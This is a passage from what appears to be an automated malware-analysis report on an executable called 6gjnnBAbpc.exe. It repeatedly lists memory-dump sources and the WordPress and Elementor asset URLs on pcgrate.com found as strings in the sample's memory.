00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 